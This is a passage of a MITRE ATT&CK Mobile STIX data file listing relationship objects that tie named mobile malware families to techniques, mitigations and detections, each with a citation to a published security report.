Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:27:01.081Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) attempts to modify the device's system partition.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f3599919-c4d1-4f2e-92d4-b34a04e33132", + "created": "2022-03-30T14:06:26.530Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can typically detect jailbroken or rooted devices. 
", + "modified": "2022-03-30T14:06:26.530Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--be7c3f83-b164-4d53-bfac-65f7437dabec", + "created": "2023-03-20T18:54:36.266Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:36.266Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ba5fc090-d420-4006-9dc0-57b75260b5f6", + "type": "relationship", + "created": "2020-07-15T20:20:59.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.296Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can collect the device’s location.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f83d618-a42d-4797-b9fe-030affdbd13f", + "created": "2023-01-18T19:46:45.399Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:49:35.020Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can hide and send SMS messages. 
[SharkBot](https://attack.mitre.org/software/S1055) can also change which application is the device’s default SMS handler.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3efe7dcc-a572-45ac-aff2-2932206a0632", + "created": "2019-08-07T15:57:13.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:52:06.559Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can access and upload the device's contact list to the command and control server.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--433af79b-ce77-4a4c-84f7-6cdc34e70674", + "created": "2023-01-18T19:56:01.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + 
"description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:48:53.396Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can intercept SMS messages.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--10e02179-0434-4d4b-86b4-5d9fbc5d5451", + "type": "relationship", + "created": "2019-10-10T15:03:27.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-10-10T15:03:27.682Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) One encrypts data using XOR prior to exfiltration.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65a24b75-4bb0-441a-8cb2-a34077b13f61", + "type": "relationship", + "created": "2020-01-27T17:05:58.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-03-26T20:50:07.154Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can collect local accounts on the device, pictures, bookmarks/histories of the default browser, and files stored on the SD card. [GolfSpy](https://attack.mitre.org/software/S0421) can list image, audio, video, and other files stored on the device. 
[GolfSpy](https://attack.mitre.org/software/S0421) can copy arbitrary files from the device.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--173c0c41-c7e3-48e9-b785-d9e0232d85ca", + "created": "2020-09-11T16:22:03.285Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:50:52.737Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect the device’s contact list.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2de76a24-ec87-4808-b0d3-b84d318ac22c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). 
Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) can read and write data in the user’s clipboard.(Citation: PaloAlto-XcodeGhost)", + "relationship_type": "uses", + "source_ref": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--789cb76e-27b0-4762-a2f7-3ff32ce0762d", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. 
Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[PJApps](https://attack.mitre.org/software/S0291) has the capability to collect and leak the victim's phone number, mobile device unique identifier (IMEI).(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e5e4567e-05a3-4d79-beab-191efc336473", + "type": "relationship", + "created": "2020-01-27T17:05:58.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-03-26T20:50:07.266Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) encrypts data using a simple XOR operation with a pre-configured key prior to exfiltration.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a8dd6ed7-910d-4bae-a2a8-19f3f32c915c", + "type": "relationship", + "created": "2019-09-23T13:36:08.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-10-14T20:49:24.646Z", + "description": "Starting in 2017, the [Rotexy](https://attack.mitre.org/software/S0411) DEX file was packed with garbage strings and/or operations.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be39c012-7201-4757-8cd6-c855bc945a9e", + "type": "relationship", + "created": "2019-07-10T15:25:57.623Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "modified": "2019-08-12T17:30:07.568Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) comes packaged with ExynosAbuse, an Android exploit that can gain root privileges.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be136fd1-6949-4de6-be37-6d76f8def41a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-10-15T19:37:21.366Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests location data from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--945db15a-b356-4e05-a6a0-9b24ca9aa348", + "created": "2022-04-20T17:42:11.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:40:15.440Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) uses standard HTTP for exfiltration.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8936c564-b11a-4c9e-a32a-76e7d7e0c8b0", + "type": "relationship", + "created": "2020-04-24T15:12:11.185Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + 
"source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:12:11.185Z", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) requests permissions to use the device camera.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--92c9106d-a71b-4a4f-a9d4-ef692a0294eb", + "type": "relationship", + "created": "2020-06-26T14:55:13.261Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T14:55:13.261Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can collect system information such as OS version, device vendor, and the type of screen lock that is active on the device.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fc816ddc-199d-47b0-93af-c81305d0919f", + "type": "relationship", + "created": "2020-06-02T14:32:31.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-02T14:32:31.767Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) has utilized malicious JavaScript and iframes to exploit WebKit running on vulnerable iOS 12 devices.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7cae8c80-c603-4352-a704-f3a2f4aa4a56", + "created": "2019-09-03T20:08:00.737Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) abuses accessibility features to intercept all interactions between a user and the device.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:39:08.123Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eca02e5c-f8de-4436-a7dd-0f656c759a42", + "type": "relationship", + "created": "2021-10-01T14:42:48.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "modified": "2021-10-06T15:32:46.477Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can use its keylogger module to take screenshots of the area of the screen that the user tapped.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59d463d3-3a41-4269-be9a-7a69f44eca78", + "created": "2020-10-29T19:21:23.215Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:03:47.434Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has communicated with the C2 server using HTTP.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ac31f650-4bd2-4bb6-b450-71e66db4888f", + "created": "2022-03-30T19:28:55.980Z", + 
"x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates typically provide patches for vulnerabilities that could be abused by malicious applications.", + "modified": "2022-03-30T19:28:55.980Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--91a4924f-2519-4662-91f2-b7ef715a459f", + "created": "2023-03-20T18:59:55.756Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:59:55.756Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e14db7d0-4053-4e0a-8b43-b950133e6e36", + "created": "2023-03-20T18:41:31.300Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:31.300Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7258542e-029b-45b9-be69-6e76d9c93b35", + "created": "2020-09-14T13:35:45.886Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:43:03.565Z", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) can hide its presence on the system.(Citation: ESET-Twitoor)", + "relationship_type": "uses", + "source_ref": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b5e8cef4-e8a1-484f-baae-cf12b26e6070", + 